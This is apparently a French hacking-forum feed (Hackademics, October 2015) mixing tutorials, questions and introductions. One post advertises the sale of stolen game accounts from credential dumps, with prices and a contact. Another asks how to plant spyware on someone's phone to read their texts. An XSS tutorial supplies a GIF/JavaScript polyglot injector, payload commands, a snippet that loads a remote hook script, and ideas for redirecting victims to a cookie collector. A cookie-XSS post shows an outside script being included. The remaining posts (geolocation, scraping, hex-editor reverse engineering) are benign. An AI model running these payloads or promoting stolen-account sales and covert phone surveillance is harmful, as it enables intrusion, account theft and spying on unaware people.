<script>

// Fonction d'appel

function succesGeo(position) {

  var infopos = "Position déterminée : <br/>";

  infopos += "Latitude : "+position.coords.latitude+"</br>";

  infopos += "Longitude : "+position.coords.longitude+"</br>";

  infopos += "Altitude : "+position.coords.altitude+"</br>";

  document.getElementById("maposition").innerHTML = infopos;

}

// demande la position

navigator.geolocation.getCurrentPosition(succesGeo);

</script>

  </head>

  <body>

      <!-- Corps de la page -->

<div id="maposition"></div>

  </body>

</html>





En effet, c'est bluffant, on a nos coordonnées avec un script plutôt simplissime. Beaucoup d'API permette en prime d'afficher le résultat sur une carte.



L'API la plus connu et utilisé est Google Maps.



Voici la liste des API Map, suivi d'un code qui intègre Google simplement :



Google Maps

http://ift.tt/wbHatA



Bing Maps

http://ift.tt/RvEeOF



OpenLayers

http://openlayers.org/



Nokia Maps

http://ift.tt/1RCeqA2



Amazon Maps API

http://ift.tt/1a3ggWW





De même, on va faire un exemple pour nous situer cette fois-ci au sein d'une carte appelée par google maps (API), copier/coller le code suivant dans un fichier geomap.html et lancé via votre navigateur.



Code mettant en pratique l'API de google dans votre navigateur :



Code:

<!DOCTYPE html>

<html>

  <head>

      <!-- En-tête de la page -->

      <meta charset="utf-8" />

      <title>Géolocalisation avec API Google Maps</title>

                  <!-- Chargement de l'API Google Maps -->

                  <script src="http://ift.tt/PV0u3s;

<script>

if(navigator.geolocation){

// Fonction d'appel

function succesGeo(position) {

  var infopos = "Position déterminée : <br/>";

  infopos += "Latitude : "+position.coords.latitude+"</br>";

  infopos += "Longitude : "+position.coords.longitude+"</br>";

  document.getElementById("maposition").innerHTML = infopos;     

        // Nouvel objet LatLng pour google map

        var latlng = new google.maps.LatLng(position.coords.latitude,position.coords.longitude);     

        // Options sur la carte

        var optionsGmaps = {

        mapTypeControl: false,

        center: latlng,

        navigationControlOptions: {style: google.maps.NavigationControlStyle.SMALL},mapTypeId: google.maps.MapTypeId.ROADMAP,

        zoom: 15

        };     

        // Initialisation de la carte

        var map = new google.maps.Map(document.getElementById("map"), optionsGmaps);     

        // Marqueur de position

        var marker = new google.maps.Marker({

        position : latlng,

        map: map,

        title : "Vous êtes ici"

        });     

}

// Requête de géolocalisation

navigator.geolocation.getCurrentPosition(succesGeo);

}

</script>

  </head>

  <body>

      <!-- Corps de la page -->

<div id="maposition"></div>

<div id="map" style="width:640px;height:480px"></div>

  </body>

</html>





Résultat escompté : (J'ai bien entendu brouiller les coordonnées)

Vous pouvez l'agrandir en jouant sur widht et height dans le bloc Div de "map".



Comme vous le constater, votre navigateur vous demande encore l'autorisation de partager votre géolocalisation et ceux grâce à par exemple pour mozilla :



  • geo.enabled (activation, désactivation position partagé).
  • geo.wifi.uri (qui indique l'adresse intérrogé avec IP/WIFI).







Simple comme bonjour mais terriblement efficace.



On vient de voir que le positionnement géographique n'est certes pas encore au point au millimètre près, qu'il est tributaire de nombreux facteurs comme avoir un appareil technologique branché sous réseau et géolocaliser, mais à notre époque peu ne possède pas cette technologie.



Citation:

Avec l'avènement du web2.0 et du 3.0, l'arrivée de l'intelligence artificielle, des puces sous-cutanées et surtout de la mise sous réseau de notre vie (véhicule, frigo, chauffage,….), nous serons localisables à tout moment et surtout à tout endroit.


Les programmes que je vous ai montrés sont basiques mais pourtant efficaces. La plupart des applications sont sous API Geo afin soi-disant d'améliorer votre expérience, je pense que de ne plus avoir d'intimité sur la planète reste le vrai problème.



Citation:

L'avenir nous dira si cette masse de technologie aura apporté un plus ou un mal au sein de nos vies.


Merci de m'avoir lu, à bientôt.



Source : W3C, mes connaissances en HTML et JavaScript. Les scripts étant déjà pratiquement donnés par les sites émetteurs le reste n'est que du bon sens.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1ZuEcet
via IFTTT

dimanche 11 octobre 2015

[Ezine fr] Rafale n°19

Bonjour, numéro 19 enfin dans les bacs !
Alors au programme:
Code:

19.00 - Sommaire : Septembre 2015

  Num  +              Titre                          ++++ Auteur
  --------------------------------------------------------------------------
  19.00 - Sommaire & Introduction & Disclaimer        ---- Rafale
  19.01 - BEEWi: Bluetooth App Reversing              ---- Xartrick
  19.02 - Survol de la scene #2: Utilisation du        ---- Xylitol
          graphisme en Cracking et Warez
  19.03 - Hacking festival #2                          ---- Pheimors
  19.04 - Introduction aux brouilleurs:                ---- Xylitol
          Le générateur IEM
  19.05 - Hack la 205                                  ---- Xylitol
  19.06 - Hacking festival #3                          ---- Xartrick
  19.07 - How to Dox                                  ---- Intrusio
  19.08 - Survol de la scene #3 - les groupes web      ---- Xylitol
  19.09 - Bric-à-brac #11                              ---- Xylitol
  19.10 - Mot de la fin & Courrier du lecteur          ---- Rafale

http://rafale.org/
Bonne lecture.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1PoRzIT
via IFTTT

Projet "d'apprentissage"

Bonjour,

J'ai une demande un peu particulière, j'aimerai créer un site web ou quelque chose d'autre pour vraiment me perfectionner dans la programmation. Mais je ne sais pas quoi créer pour regrouper plusieurs langage informatique, c'est pour sa que je suis la, je sais que c'est un peu vague mais j'aimerai concevoir quelque chose avec plusieurs langages.

J'aimerai créer sa avec comme langage :
Html/css
Php/mysql
Python
c/++

Auriez-vous une idée pour moi ?

Merci


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1jXn7JQ
via IFTTT

Problème durant l'installation d'Ubuntu

Bonjour à tous,

J'ai un problème pour installer ubuntu, je le lance via clé usb non persistant. Je le lance aucun problème, durant l'installation il me dit qu'il ne détecte pas mon système d'exploitation, donc je dois faire les partitions en manuelle. C'est la que le problème viens, je ne peut pas crée d'autre partition, les partitions windows sont en NTFS et pour linux je dois crée une partition en "swap" si je me souviens bien mais impossible de la crée..
J'ai regardé beaucoup de forum pour avoir de l'aide mais je n'arrive vraiment pas à résoudre mon problème. Je sais que sa manque d'info si vous avez besoin de plus d'infos je vous donnerai se qu'il vous faut.

Merci..


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1MppiB8
via IFTTT

samedi 10 octobre 2015

[PROJET]- Magasin de compte de jeux

Bonjour je suis nouveau dans ce site et même sur touts le net français, donc si ce que je fait la et interdit merci de me le dire.

Voila je suis un membre de la Team: [CMHT] Malice Team. c'est un petits groupe de hackeur russe pas très connues voire pas du touts (on fait touts pour ne pas faire parlés de nous). Donc voila, touts d'abord je vais vous parlés de hackeur russe et du net russe.

Contrairement au net français sur le net russe il y a beaucoup plus de hackeur et de forum pour les hackeur. dans ma petite Team je fait partie des Brutteur/Checkeur/DDosseur/Dumppeur. et mon projet je vais vous le présentai. Donc touts d'abord il consiste de vendre des compte de jeux a prix cassé. m'ait comme vous vous douté il sont bien sure sortie de DUMMP. je ne vais pas expliqué ce que c'est les Dummp et comment en faire. je veut montés un petits projet avec des perssone serieuse qui consisterai a vendre ces mêmes compte sortie de ces DUMMP. par exemple des compte Origine. il y a 2 sorte de compte sur Origine ceux avec la clef et ceux sans. ceux qui on pas la clef peuvent étre récupéré a touts moment par leur propriétaire. ceux qui l'on ne seront jamais restitué ou repris par le propriétaire.

C'est a dire, si vous acheter un compte BF4 sans clef vous pourrait y jouai 1h-2h, 1j-2j ou même toujours (sa dépend vraiment du compte), m'ait si vous acheter un compte BF4 Avec la clef ce sera la même chose que si vous l'avez acheter chez origine même car ce compte vous appartiendra pour toujours.

Donc voici un ceux que j'avais pensais. ( petite exemple )

Bonjour je suis un membre de la [CMHT] Malice Team ( un groupe de hacker russe peut connue )

Donc voila je vent plusieurs compte BF4 , BF3 , TITAN , touts les jeux son sur plateforme Origine.

Sur certain compte j'ai la le mots secret sur d'autre je ne l'ai pas. voici les prix.

BF4 Sans clef secret: 1.50€ Paypal
BF4 Premium Sans clef secret: 1.80€ Paypal
BF3 Sans clef secret: 1.00€ Paypal
BF3 Premium Sans clef secret: 1.50€ Paypal
TITAN sans clef secret: 1.50€ Paypal
---------------------------------------------------------

BF4 Avec clef secret (+Garantie que on ne vous le volera jamais): 4€ Paypal
BF3 Avec clef secret (+Garantie que on ne vous le volera jamais): 3€ Paypal
TITAN Avec clef secret (+Garantie que on ne vous le volera jamais): 4€ Paypal

----------------------------------------------------------

BF4 Premium Avec clef secret (+Garantie que on ne vous le volera jamais): 9€ Paypal
BF3 Premium Avec clef secret (+Garantie que on ne vous le volera jamais): 6€ Paypal

Je peut passer un test avec un modo pour montres ma collection de compte.

Vous pouvais me contacte par skype: kumik0544


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1K0rJDU
via IFTTT

Tutoriel Quand l'image se met au service de l'XSS

Quand l'image se met au service de l'XSS


XSS, on connaît, on sait depuis que la plupart des plates-formes web et applications à un petit bug affilié à l'injection JavaScript. C'est pour cela que ces 5 dernières années XSS a bravé chaque marche vers le sommet des failles applicatives.
J'ai écrit à l'époque pas mal d'articles ou d'ebook traitant du sujet et il s'avère qu'aujourd'hui, elle a atteint son apogée auprès de la jeunesse geek.
Même google s'y est mis avec cet excellent site pour apprendre tout en s'amusant et surtout avec les techniques pour se prémunir de cette attaque :
http://ift.tt/1QgVaHc

Cependant, même si l'injection de fichier fait progressivement sombrer ses places au Top 10, je pense qu'il fallait que l'on parle du travail sur image.
Qu'est-ce qu'une image ?

On en connaît surtout ses principales extensions BMP, JPEG, PNG et GIF. Je ne vais pas m'attarder sur ce sujet, on s'écarterait du thème.
Beaucoup de spécialistes en sécurité aiment tester les recoins et les limites de défense des applications. La protection contre le XSS a amené à une période à chercher de nouveaux vecteurs offensifs.

Alors si l'on ne peut injecter directement un script JS, comment faire ?
Ils ont remarqué que si l'administrateur ou la plate-forme permettait d'exécuter des fichiers sources JS chargés depuis le même domaine, on aurait alors la possibilité de contourner le système. Pour cela, l'application Web doit avoir un WYSIWYG éditeur qui permettra d'écrire du HTML et le téléchargement des images.

Alors là, il a suffi pour les pirates informatiques de créer un programme ou un script dans leur langage favori afin de pouvoir soit insérer le script dans l'image, soit créer une image simple mais contenant le payload.

Le payload un mot qui veut juste dire pour les débutants le script qui agit. Si vous êtes dans le cadre d'une faille SQL, vous aurez un payload qui agira sur la faille par exemple en extirpant les identifiants directement de la base de données.

Une faille XSS agira de plusieurs manières, cela dépendra de son type : stored ou reflected.

Je ne reviendrais pas sur tout, mais ce qu'il est intéressant dans ce cas précis serait d'Hook à l'aide d'une image infectée d'un payload qui aura comme action une redirection vers un phishing site, voire vers un collecteur de base de cookies.
Hook signifie que l'on veut accrocher la cible, on cherche à l'amener à utiliser notre payload. Malgré, la force de XSS, souvent on doit agir sur les intentions de la victime.

Pour cet article, on va voir trois scripts différents qui ne sont pas de moi. Le premier est codé en ASM, le second en Python et le dernier en C.

GIF injecté en Python.

Voici les deux scripts : http://ift.tt/1fnSu89 et http://ift.tt/1jhFUzt

Dans ce script en python, on peut rapidement voir que cette partie s'occupe de la création et de l'injection du payload.


Code:

def _generate_and_write_to_file(payload, fname):
    """
    Generates a fake but valid GIF within scriting
    """
    f = open(fname, "wb")
    header = (b'\x47\x49\x46\x38\x39\x61'  #Signature + Version  GIF89a
                        b'\x2F\x2A' #Encoding /* it's a valid Logical Screen Width
                        b'\x0A\x00' #Smal Logical Screen Height
                        b'\x00' #GCTF
                        b'\xFF' #BackgroundColor
                        b'\x00' #Pixel Ratio
                        b'\x2C\x00\x00\x00\x00\x2F\x2A\x0A\x00\x00\x02\x00\x3B' #GlobalColorTable + Blocks
                        b'\x2A\x2F' #Commenting out */
                        b'\x3D\x31\x3B' # enable the script side by introducing =1;
                                        )
    trailer = b'\x3B'
        # I made this explicit, step by step .
    f.write(header)
    f.write(payload)
    f.write(trailer)
    f.close()
    return True


Il ouvre le header avec l'en-tête \x2A\x2F, ce qui signale qu'il s'agit d'un GIF. Ouvrez une image GIF à l'aide d'un logiciel HEXADECIMAL et vous verrez le Metadata : GIF89a correspondant à : "\x47\x49\x46\x38\x39\x61".

Pour plus d'informations : http://ift.tt/1jhFUzu

De même pour une image BMP, PNG ou JPEG, on verra à faire attention aux en-têtes et à la signature qui dira à la lecture : "Oui je suis bien une image Gif,…"

Pour les utiliser :

Code:

gif_injector.py -i image.gif "alert(\"Learn XSS with gif\");"
gif_injector.py -i image.bmp  "alert(\"Learn XSS with gif\");"

Vous l'afficher sur une page html pour voire le résultat :

Code HTML:

<html>
<head>
<title>Image XSS injection</title>
</head>
<body background="http://ift.tt/1jhFSri;>
<img src="imag.gif_exploit.gif" />
<script src="imag.gif_exploit.gif"></script>
</body>
</html>


On peut également aller plus loin et obfusquer le code:
Code:

gif_injector.py -i imag.gif "var _0x9c4c=[\"\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\",\"\x0A\",\"\x4F\x4B\"];var a=_0x9c4c[0];function MsgBox(_0xccb4x3){alert(_0xccb4x3+_0x9c4c[1]+a);} ;MsgBox(_0x9c4c[2]);"


Imaginez sur un site qui par exemple accepte n'importe quel format gif mais qui plus est supporte le langage html, il suffirait alors de mettre ceci dans un poste, une signature, un commentaire, … et par exemple d'injecter ce code:

Code:

gif_injector.py -i image.gif "location.replace(\"http://ift.tt/1QgVaXB);"
La c'est gentil, ce n'est qu'une redirection vers google, mais si je mets site où j'ai hébergé une plateforme qui récupère les cookies, la ce serait catastrophique.

En C, on a plusieurs scripts qui le permettent comme : http://ift.tt/1pDZOXj , http://ift.tt/1jhFSro

En ASM : http://ift.tt/1QgVbLe, http://ift.tt/1QgVbLi
nasm gifjs.asm -o imug.gif



Code:

[~] Author: Osanda Malith Jayathissa
[~] Website: http://ift.tt/1jhFUQ0
[~] E-Mail: osanda[cat]unseen.is

[-] Usage: F:\XSS\ImageExploiter-master\ImageExploiter-master\imgexploiter.exe -
i <image file name> -f <gif or bmp> -p <payload string>


imgexploiter.exe -I  imag.gif -f gif  –p prompt\(1337\)
imgexploiter.exe –i yourimage.bmp –f bmp –p prompt\(1337\)

Aller plus loin avec Xenotix http://xenotix.in/
Laissé un peu pour compte pour son approche un peu trop automatisée, pourtant elle peut découvrir des failles XSS là où vous vous buter depuis des jours. Possédant des centaines de payload intégrés vous aurez vite fait le tour de tout ce qui est capable de faire sur une page web et ceux plus rapidement qu'à la main.

Télécharger le puis une fois le serveur activé -> Paramètres -> Configurer le serveur. Une URL va vous être donnée de cette sorte :

http://ift.tt/1QgVbLl .js



En fait, cela permet d'utiliser le serveur local afin de hooker la page web qui sera infecter ou rediriger dessus.

Pour l'utiliser avec le script il suffit dans gifjs.asm :

Code:

db 's = document.createElement("script");'
db 's.src = "http://ift.tt/1QgVaXQ;;'
db 'document.body.appendChild(s);'

Compiler :
Code:

Yasm gifjs.asm -o img.gif ou nasm gifjs.asm -o img.gif
Intégrer la dans une page HTMl et lorsque la page chargera le fichier GIF. Ouvrez une console Firebug ou Deveoppeur (F12) et vous pouvez voir un message dans la console

Resource interpreted as Script but transferred with MIME type image/gif: "file:///C:/Users/Desktop/jspics/img.gif".

Cela nous donne juste un soupçon que la page avait demandé et interprété une GIF comme JS. Ceci est utile pour les analystes de logiciels malveillants pour identifier les malwares intégrés dans des images.

Maintenant, la page est xooked et vous pouvez utiliser Xenotix pour tirer partie de cette situation. Nous allons utiliser le module IP2Gelocation, Retour à Xenotix et exécuter le module IP2Geolocation de collecte d'information -> Victime d'empreintes digitales -.> IP2Geolocation Cliquez sur empreintes digitales et vous obtiendrez quelque chose comme ca.



Pour se défendre contre les injections XSS, je vous renvoie vers cet excellent article :

http://ift.tt/1QgVc1D

Mais, il faut surtout éviter de laisser la possibilité d'écrire en HTML n'importe où sur un site.

J'espère que vous aurez appris quelques chose de plus sur les injections XSS. Vous avez pu aussi comprendre que les fichiers peuvent être compromis et ces dernières années des chercheurs en sécurité ont réussis des injections par PDF, DOC, ODT, … Si j'ai du temps je verrais pour créer un article dessus.

Comme quoi, on peut sécuriser au maximum, la sécurité maximum n'existe pas à partir du moment où l'on a posé un pied dans le réseau.

Merci de m'avoir lu, à bientôt.

Source : http://ift.tt/1gsCzHq, Marco Ramilli's Blog, entre autre, à l'époque je l'avais découvert à l'aide d'un exellent blogue de sécurité chinois, mais je n'ai plus retrouver l'adresse.

PS: je suis passer sur beaucoup d'explications puisque cet article est destiné à des personnes ayant des connaissances basiques en faille XSS, Format MIMe, Hexadécimal,...


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1jhFUQd
via IFTTT

vendredi 9 octobre 2015

une nouvelle

Bonjour

je m'appelle Pooum et je cherche à progresser dans cet univers du Hacking
je parcours le forum actuellement pour en comprendre le fonctionnement et j'espère pouvoir participer rapidement
merci pour l'accueil


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1MjnWIb
via IFTTT

espionner un portable

Bonjour la communauté :D
je ne sais pas si c'est possible de m'aider
j’essaie d'installer un logiciel espion sur un téléphone portable à distance pour récuperer des sms
j'ai essayé avec certains logiciels que j'ai trouvé sur internet mais à chaque fois ça n'a pas fonctionné car on me demande de payer un abonnement pour une lampe torche ou autre bêtise
Quelqu'un pourrais m'apprendre
merci


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1MjnUQi
via IFTTT

mardi 6 octobre 2015

Web Scraping is Beautiful




Le webScraping est le "grattage Web (où Web récolte donnée Internet de l'extraction) est une technique de logiciel informatique de l'extraction d'informations à partir de sites web".

Lorsque nous cherchons un bug, identifier sur un système une partie qui ne sera pas conforme au bon fonctionnement des logiciels qui tourne dessus, nous est amenée à récolter et à analyser des données.L'HTML analysé est facile en Python, en particulier avec l'aide de la bibliothèque Beautiful Soup.

On a beaucoup d'autres librairies possibles pour ce type de pratique. J'ai voulu partager ce programme qui n'est pas optimisé au maximum de ses capacités, attention, je ne traite pas encore de tout. Je partagerai bientôt d'autres programmes travaillés en C++ et python voire même Perl qui nous permettra de travailler sur les couches réseaux.Mais chaque chose en son temps. Vous avez sur Hackdemics des tutoriels conséquents sur le sujet, ainsi que ceux que j'ai partagés dernièrement sur SSL/TLS et SMTP.

Modules à installer, Dépendances :
tldextract
Beautiful Soup 4
Requests


Python V3.4

Je sais que Fred sera réticent, c'est normal, chacun a leurs préférences, personnellement j'utilise le module sur le moment. Mais Beautiful a cette chance d'avoir depuis 2004 été de sauver par les programmeurs.
Beautiful Soup se trouve au sommet des analyseurs Python comme lxml et html5lib, vous permettant d'essayer différentes stratégies d'analyse. On apprécie sa flexibilité et surtout sa librairie présentant de nombreuses fonctions facilement utilisables.


Ce que j'essaie de montrer est qu'avec des connaissances l'on peut facilement établir des petits programmes afin de réaliser des techniques simples.Le code suivant a été réalisé en 2h de temps, je n'ai donc pas traité les erreurs (except), ni chercher à optimiser certaines parties, ni à extraire sur un fichier, mais surtout à créer rapidement un script utilisant beautiful, request et tdlextract afin que vous perceviez leurs utilisations au sein d'un programme.


Si ces modules vous intéressent, ils peuvent être étendus plus sur un spectre d'action plus large que le mien.



Code:

# -*- coding: cp1252 -*-

# -*- coding: UTF-8 -*-


##### Modules import #####

from bs4 import BeautifulSoup
import requests
import urllib.request
import re
import tldextract
import os

##### Mise en place des Fonctions #####

def Scraping():
    url = input ("Entrer a website à Parser (www.site.com): ")
    r  = requests.get("http://" +url)
    data = r.text
    soup = BeautifulSoup(data, "html.parser")
    for link in soup.find_all('a'):
        print(link.get('href'))

def Extract():
    Extract = input ("Entrer l'url d'un site à extraire : ")
    Ext = tldextract.extract(Extract)
    print (Ext, Ext.subdomain, Ext.domain, Ext.suffix, Ext.registered_domain, '.'.join(Ext[:2]))


def ExtractHTML():
    url = input("Entrer l'URL du Website :")
    req = urllib.request.Request(url)
    resp = urllib.request.urlopen(req)
    respData = resp.read()
    print(respData)


def ExtractOnly():
    url = input("Entrer l'URL du Website :")
    req = urllib.request.Request(url)
    resp = urllib.request.urlopen(req)
    respData = resp.read()
    balise = input ("Entrer les balises à extraire (p,a,...): ")
    paragraphs = re.findall(r'<' + balise + '>(.*?)</' + balise + '>',str(respData))
    print (paragraphs)



def menu():
    os.system("clear")
    print ("###################################################")
    print ("#              Scraping Website                  #")
    print ("#                Scrap & Extract                  #")
    print ("#              -----------------                #")
    print ("#                DreAmuS/HelioS                  #")
    print ("###################################################")
    print ("")
    print (" [+] 1 - Scraping les Liens d'un website")
    print (" [+] 2 - Extraire les Noms de Domaines")
    print (" [+] 3 - Extraire HTML")
    print (" [+] 4 - Extraire une partie de l'URL")
    print (" [+] 5 - Quitter")
    print ("-------------------------------------------------)
    choix = int(input("Tapez Votre Choix >>> "))

    if (choix == 1):
        Scraping()
        menu()
    elif (choix ==2):
        Extract()
        menu()
    elif (choix == 3):
        ExtractHTML()
        menu()
    elif (choix == 4):
        ExtractOnly()
        menu()
    elif (choix == 5):
        quit
    else:
        menu()


if __name__=="__main__":
    menu()


1 - Scraping les Liens d'un website : On va scraper les liens en rapport avec le NDD
2 - Extraire les Noms de Domaines : On va extraire les NDD en rapport
3 - Extraire HTML : On va extraire l'url de la page demandé
4 - Extraire une partie de l'URL : On va extraire une partie spécifique (exemple: on met l'url d'une page et p qui scrapera que ce qu'il y a entre <p> et </p>)
5 - Quitter : On quitte le programme qui reviens en boucle


Ainsi, vous verrez qu'il est possible d'utiliser cette première ébauche pour rajouter des modules et fonctions afin de par exemple comme l'avait à l'époque cet anglais en scrapant l'intégralité des fichiers d'une prison, en tâtonnant et en précisant son script sur les bonnes balises.Il avait ainsi sans avoir besoin de voir la page enregistrer sous fichier texte, les fichiers prouvant la puissance du scraping devant des obstacles.

Dans son dernier poste, Fred nous expliquait comment avec Python, il avait pu récupérer les mp3. Le Scraping peut être utilisé pour tous.
La prochaine fois, je partagerais un script que je déploirais sur réseau avec sa version C++, perl et python.

En espérant cela vous a plu.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1OWu7TS
via IFTTT

Tutoriel Premier pas en Reverse Engineering

Salutation !

Avant toutes choses j'aimerai éclaircir quelques points : ce tutoriel s’adresse à des débutants en reverse engineering et si vous avez des questions n'hésitez pas j'essaierai d'y répondre au plus vite (- de 24H).
Sur ce bon tuto !


Beaucoup de gens pensent que le Reverse Engineering est quelque chose de difficile, où il faut savoir décrypter parfaitement le langage ASM pour pouvoir ne serait ce que commencer à comprendre les agissements d'un programme … Que n'est ni !

Dans ce premier tutoriel (oui il y en aura donc d'autres:p) nous allons faire nos premier pas dans ce monde incroyable qu'est le reverse engineering, ici d'un PE (Portable Exécutable) … enfin d'un .exe Windows quoi ! :p

Pour ce tutoriel je n'utiliserai qu'un outil très pratique qu'est un éditeur hexadécimal !
Personnellement j'utilise Ghex (sous Ubuntu) et Frhed sous Windows (ici je serait sous Ghex), tout deux sont à mon sens très bien et surtout gratuit mais libre à vous d'en n'utiliser d'autres.
Vous pouvez d’ailleurs utiliser un simple éditeur de texte mais bon c'est moi classe. :cool:

Nous prendrons pour exemple ici un utilitaire de test réseau, notre but sera de prouver uniquement à la lecture du fichier avec notre éditeur hexadécimal que notre exécutable utilise bien des fonctions réseaux.

Bon à l'attaque !

Commençons par ouvrir notre fichier avec notre éditeur hexadécimal et la … WTF ?!

cour-1.jpg

Ne partez pas tout de suite les choses vont commencer a être intéressantes !
Je vous rassure nous travaillerons uniquement grâce à la partie de droite.

Bon maintenant nous allons devoir commencer nos recherches …
Le fichier est un exécutable Windows qui utilise des fonctions réseau jetons un coup d’œil aux DLL réseaux de Windows : ils sont au nombre de deux (il y en a plus mais se sont les plus utilisé/important) : wsock32.dll et ws2_32.dll.
Très bien cherchons si ces DLLs sont mentionnés ici et magie :

cour-2.jpg

Petite astuce : le nom du dll peut être transcrit en hexadécimal de différentes manière, par exemple : « WS2_32.DLL », « ws2_32.DLL », « ws2_32.dll », « WS2_32.dll » ...
Donc n'abandonner pas vos recherches si vous ne trouvez pas du premier coup, essayez les diverses écritures comme dans les exemples ci-dessus.


Maintenant nous savons que l’exécutable charge une librairie dynamique pour utiliser des fonctions réseaux.
Voyons maintenant s'il utilise vraiment ces fonctions …

NB : 1) les fonctions des DLLs Windows ont, à quelques exception près les même nom que celle en C/C++. Par exemple la fonction de connection du DLL ws2_32.dll (et aussi de wsock32.dll) est connect(), comme en C/C++.
2) Pour connaître toutes les fonctions stockés dans un DLL il existe un très bon outil gratuit (uniquement pour Windows) qui se nomme Depends.


Nous pouvons ici voir diverses fonctions réseaux chargés comme par exemple : connect(), send(), closesocket() ...

cour-3.jpg

Nous pouvons donc affirmer que cet exécutable utilise bien des fonctions réseaux.
Mission Accomplie !!!

Alors c'était si compliqué que ca ?

HexaHacker
Images jointes


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1MXfYCZ
via IFTTT

Le nouveau Codark !

Pseudo (+autres si plusieurs) : Codark, scordailo (pour les jeux)

Connaissances informatiques générales : je commence à avoir de bonne base en html 5, j'ai passé 1 semaine à apprendre le langage python sans continué, j'ai pour projet d'apprendre le php,c/c+. Je suis encore un débutant ! Mais un débutant motivé.

Connaissances en hacking : je n'ai pas de réel compétence je regarde des tutos à droite à gauche je me renseigne tranquillement, je préfère maîtriser les langages avant de commencer vraiment à m'impliquer dans le "hacking".

Système d'exploitation principal : Windows 10, je vais passer sur ubuntu prochainement et si mes projets aboutissent j'irai sur Kali.
Je viens sur ce forum pour : Je ne viens pas sur le forum pour qu'on me dise fais si fais sa, surtout pour avoir des conseils de professionnels dans la matière, se forum me parait le plus approprié pour faire mes débuts dans une communauté de white-hat.

J'ai connu ce forum via : Mes recherches personnelle.

Informations supplémentaires (job, intérêts, autres...) : Je vais me lancer dans un Bac pro SEN (Electronique et informatique) en alternance. J'aimerai poursuivre mes études dans la sécurité informatique.

Ps : J’espère ne pas avoir fais trop de faute.

Cordialement Codark ! :)


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Q4XKQq
via IFTTT

lundi 5 octobre 2015

Je suis TheSuperGeek

Bonjour, je suis TheSuperGeek !
Voici ma présentation :
Connaissances informatiques générales : Connaissances en linux et en Windows (de 95 à 8.1); surtout orienté sécurité; mais toutes issus du bidouillage.
Connaissances en hacking : Aucunes connaissances particulières, je vient pour aprrendre :)
Système d'exploitation principal : Linux (pour le moment Manjaro GNOME)
Je viens sur ce forum pour : Apprendre
J'ai connu ce forum via : Google
Informations supplémentaires (job, intérêts, autres...) : Je cherche un tuto en français sur l'analyse forencique.
Merci et @+


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1VBNiS9
via IFTTT

Tutoriel Cookie Site Scripting : le danger du stockage abusif dans les cookies

Salutation !

Bon à la vue du titre vous devez surement vous dire ceci :
Le Cookie Site Scripting ?! Mais qu'est ce donc ?

Et bien j'ai découvert cette faille il y a peu de temps.
Bien que cette faille soit peu rependue son exploitation est simple, il s'agit tout bêtement d'un Cross Site Scripting mais via les cookies !
Je m'explique : imaginons qu'un site, par exemple désire stocker sur votre machine (via un cookie) un message qui s'affichera à votre connexion au site ...
Prenons un exemple simple : "Bienvenue [PSEUDO] !"
Vous voyez où je veux en venir ?
Un utilisateur malveillant pourrait réécrire le cookie et y placer un code malveillant : "<script type="text/javascript" src="http://ift.tt/1LtHxX2;
Et hop le tour est joué le pirate vient d'inclure son shell ou pire encore :eek:!

Donc évitez de stocker n'importe quoi dans vos cookies, ou alors dans ce cas utilisé par exemple la fonction PHP htmlentities() !

HexaHacker


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1VBCbIO
via IFTTT

Présentation HexaHacker

Salutation !

Bon une présentation s'impose !
Donc je suis HexaHacker (enfin tout le monde m'appelle hexa :p).
Je suis programmeur en C/C++ HTML/CSS PHP/MySQL et Python et passionné depuis plusieurs années de sécurité informatique
Je connais pas mal de chose sur le Web Hacking (base et +), sur l'infection d'une machine sous Windows (toute versions confondue à partir de XP SP1) et la récupération d'informations clés et donc comment les protéger et contrer de potentiels intrusions.
Je tourne en Dual Boot Windows 7/Ubuntu.
Je viens sur ce forum pour pouvoir partager une nouvelle fois mes connaissances et aider les membres (je suis un ancien de hackforumfrench).
J'ai connu ce forum via Google tout simplement :cool:
Sinon j'aime les jeux vidéos, la musique enfin vous voyez quoi !

À bientôt sur le forum !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1VBCbIJ
via IFTTT

Html 5

Bonjour à tous !

Je crée ce topic pour vous demander quelques conseils.
Depuis quelques temps j'apprend le langage HTML 5 (sur Openclassrooms), j'ai fini leur cour sur le html, mais je trouve que je ne maîtrise pas encore assez.
Avez vous des petits conseils pour que je m'améliore d'avantage ? Ou même des sites pour se perfectionner ?

Merci


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1FQ1THL
via IFTTT

samedi 3 octobre 2015

Cisco Networking Academy

Bonjour groupe!

Je vous partage le dernier cours complet du CCNA. Il est anglais.

Je vous confirme que c'est le dernier, car je viens de terminer ce cours via Netacad

Mod 1: http://ift.tt/1OOFvkV
Mod 2: http://ift.tt/1OOFygu
Mod 3: http://ift.tt/1OOFvBd
Mod 4: http://ift.tt/1OOFvBf


